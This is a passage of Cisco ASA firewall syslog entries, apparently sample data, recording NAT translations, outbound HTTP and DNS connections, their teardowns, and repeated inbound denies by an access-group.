inside:172.31.98.44/56132 duration 0:00:00 bytes 221 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1452 to outside:192.168.98.44/8265 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11774 for outside:192.168.179.219/80 (192.168.179.219/80) to inside:172.31.98.44/1452 (172.31.98.44/1452) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11775 for outside:192.168.157.232/53 (192.168.157.232/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11776 for outside:192.168.178.133/53 (192.168.178.133/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11775 for outside:192.168.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 101 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11776 for outside:192.168.178.133/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 126 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1453 to outside:192.168.98.44/8266 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11777 for outside:192.168.133.112/80 (192.168.133.112/80) to inside:172.31.98.44/1453 (172.31.98.44/1453) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11777 for outside:192.168.133.112/80 to inside:172.31.98.44/1453 duration 0:00:00 bytes 862 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11779 for outside:192.168.204.197/53 (192.168.204.197/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11778 for outside:192.168.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11779 for outside:192.168.204.197/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 176 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1454 to outside:192.168.98.44/8267 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11780 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1454 (172.31.98.44/1454) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1455 to outside:192.168.98.44/8268 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11781 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1455 (172.31.98.44/1455) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1456 to outside:192.168.98.44/8269 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11782 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1456 (172.31.98.44/1456) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11783 for outside:192.168.100.4/53 (192.168.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11783 for outside:192.168.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1457 to outside:192.168.98.44/8270 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11784 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1457 (172.31.98.44/1457) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1458 to outside:192.168.98.44/8271 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11785 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1458 (172.31.98.44/1458) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11786 for outside:192.168.1.107/53 (192.168.1.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11784 for outside:192.168.198.40/80 to inside:172.31.98.44/1457 duration 0:00:00 bytes 593 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1459 to outside:192.168.98.44/8272 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11787 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1459 (172.31.98.44/1459) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11786 for outside:192.168.1.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 375 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1460 to outside:192.168.98.44/8273 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11788 for outside:192.168.192.44/80 (192.168.192.44/80) to inside:172.31.98.44/1460 (172.31.98.44/1460) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1454 to outside:192.168.98.44/8267 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1385 to outside:192.168.98.44/8277 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11797 for outside:192.168.19.254/80 (192.168.19.254/80) to inside:172.31.156.80/1385 (172.31.156.80/1385) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1455 to outside:192.168.98.44/8268 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1456 to outside:192.168.98.44/8269 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1457 to outside:192.168.98.44/8270 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1458 to outside:192.168.98.44/8271 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1459 to outside:192.168.98.44/8272 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1460 to outside:192.168.98.44/8273 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11564 for outside:192.168.115.46/80 to inside:172.31.156.80/1382 duration 0:05:25 bytes 575 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11797 for outside:192.168.19.254/80 to inside:172.31.156.80/1385 duration 0:00:00 bytes 5391 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1386 to outside:192.168.98.44/8278 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11798 for outside:192.168.115.46/80 (192.168.115.46/80) to inside:172.31.156.80/1386 (172.31.156.80/1386) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1275 to outside:192.168.98.44/8279 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11799 for outside:192.168.205.99/80 (192.168.205.99/80) to inside:172.31.98.44/1275 (172.31.98.44/1275) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1190 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11800 for outside:192.168.14.30/53 (192.168.14.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11800 for outside:192.168.14.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 373 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11801 for outside:192.168.252.210/53 (192.168.252.210/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11801 for outside:192.168.252.210/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 207 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1276 to outside:192.168.98.44/8280 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11802 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1276 (172.31.98.44/1276) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1277 to outside:192.168.98.44/8281 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11803 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1277 (172.31.98.44/1277) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11802 for outside:192.168.98.165/80 to inside:172.31.98.44/1276 duration 0:00:00 bytes 12853 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1278 to outside:192.168.98.44/8282 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11804 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1278 (172.31.98.44/1278) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11803 for outside:192.168.98.165/80 to inside:172.31.98.44/1277 duration 0:00:00 bytes 5291 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1279 to outside:192.168.98.44/8283 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11805 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1279 (172.31.98.44/1279) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11804 for outside:192.168.98.165/80 to inside:172.31.98.44/1278 duration 0:00:00 bytes 965 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11805 for outside:192.168.98.165/80 to inside:172.31.98.44/1279 duration 0:00:00 bytes 8605 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1280 to outside:192.168.98.44/8284 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11806 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1280 (172.31.98.44/1280) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11806 for outside:192.168.98.165/80 to inside:172.31.98.44/1280 duration 0:00:00 bytes 3428 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1281 to outside:192.168.98.44/8285 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11807 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1281 (172.31.98.44/1281) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1282 to outside:192.168.98.44/8286 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11808 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1282 (172.31.98.44/1282) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1283 to outside:192.168.98.44/8287 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11809 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1283 (172.31.98.44/1283) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1284 to outside:192.168.98.44/8288 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11810 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1284 (172.31.98.44/1284) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11807 for outside:192.168.98.165/80 to inside:172.31.98.44/1281 duration 0:00:00 bytes 2028 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11808 for outside:192.168.98.165/80 to inside:172.31.98.44/1282 duration 0:00:00 bytes 1085 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11809 for outside:192.168.98.165/80 to inside:172.31.98.44/1283 duration 0:00:00 bytes 868 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1285 to outside:192.168.98.44/8289 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11811 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1285 (172.31.98.44/1285) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1286 to outside:192.168.98.44/8290 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11812 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1286 (172.31.98.44/1286) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11810 for outside:192.168.98.165/80 to inside:172.31.98.44/1284 duration 0:00:00 bytes 4439 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1287 to outside:192.168.98.44/8291 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11813 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1287 (172.31.98.44/1287) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11811 for outside:192.168.98.165/80 to inside:172.31.98.44/1285 duration 0:00:00 bytes 914 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11812 for outside:192.168.98.165/80 to inside:172.31.98.44/1286 duration 0:00:00 bytes 871 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11814 for outside:192.168.100.107/53 (192.168.100.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1288 to outside:192.168.98.44/8292 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11815 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1288 (172.31.98.44/1288) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11814 for outside:192.168.100.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 384 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11816 for outside:192.168.104.8/53 (192.168.104.8/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11816 for outside:192.168.104.8/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 94 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1289 to outside:192.168.98.44/8293 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11817 for outside:192.168.123.191/80 (192.168.123.191/80) to inside:172.31.98.44/1289 (172.31.98.44/1289) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11815 for outside:192.168.98.165/80 to inside:172.31.98.44/1288 duration 0:00:00 bytes 945 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11813 for outside:192.168.98.165/80 to inside:172.31.98.44/1287 duration 0:00:00 bytes 13284 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11818 for outside:192.168.100.4/53 (192.168.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11818 for outside:192.168.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1290 to outside:192.168.98.44/8294 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11819 for outside:192.168.198.25/80 (192.168.198.25/80) to inside:172.31.98.44/1290 (172.31.98.44/1290) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 9828 for outside:192.168.48.1/67 to NP Identity Ifc:255.255.255.255/68 duration 0:58:46 bytes 58512 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1272 to outside:192.168.98.44/8276 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11820 for outside:192.168.3.39/53 (192.168.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11821 for outside:192.168.162.30/53 (192.168.162.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11820 for outside:192.168.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 168 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11822 for outside:192.168.3.39/53 (192.168.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11821 for outside:192.168.162.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 198 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11822 for outside:192.168.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11823 for outside:192.168.48.186/53 (192.168.48.186/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11823 for outside:192.168.48.186/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 84 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1291 to outside:192.168.98.44/8295 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11824 for outside:192.168.54.190/80 (192.168.54.190/80) to inside:172.31.98.44/1291 (172.31.98.44/1291) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11825 for outside:192.168.254.94/53 (192.168.254.94/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11825 for outside:192.168.254.94/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 188 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1292 to outside:192.168.98.44/8296 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11826 for outside:192.168.54.190/80 (192.168.54.190/80) to inside:172.31.98.44/1292 (172.31.98.44/1292) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1293 to outside:192.168.98.44/8297 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11827 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1293 (172.31.98.44/1293) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1294 to outside:192.168.98.44/8298 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11828 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1294 (172.31.98.44/1294) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11827 for outside:192.168.98.165/80 to inside:172.31.98.44/1293 duration 0:00:00 bytes 5964 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1295 to outside:192.168.98.44/8299 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11829 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1295 (172.31.98.44/1295) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1296 to outside:192.168.98.44/8300 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11830 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1296 (172.31.98.44/1296) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11828 for outside:192.168.98.165/80 to inside:172.31.98.44/1294 duration 0:00:00 bytes 6694 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11829 for outside:192.168.98.165/80 to inside:172.31.98.44/1295 duration 0:00:00 bytes 1493 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11830 for outside:192.168.98.165/80 to inside:172.31.98.44/1296 duration 0:00:00 bytes 893 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1297 to outside:192.168.98.44/8301 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11831 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1297 (172.31.98.44/1297) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1298 to outside:192.168.98.44/8302 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11832 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1298 (172.31.98.44/1298) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11833 for outside:192.168.179.9/53 (192.168.179.9/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11833 for outside:192.168.179.9/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11831 for outside:192.168.98.165/80 to inside:172.31.98.44/1297 duration 0:00:00 bytes 2750 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1299 to outside:192.168.98.44/8303 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11834 for outside:192.168.247.99/80 (192.168.247.99/80) to inside:172.31.98.44/1299 (172.31.98.44/1299) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1300 to outside:192.168.98.44/8304 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11835 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1300 (172.31.98.44/1300) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11832 for outside:192.168.98.165/80 to inside:172.31.98.44/1298 duration 0:00:00 bytes 881 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11835 for outside:192.168.98.165/80 to inside:172.31.98.44/1300 duration 0:00:00 bytes 2202 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1301 to outside:192.168.98.44/8305 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11836 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1301 (172.31.98.44/1301) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: 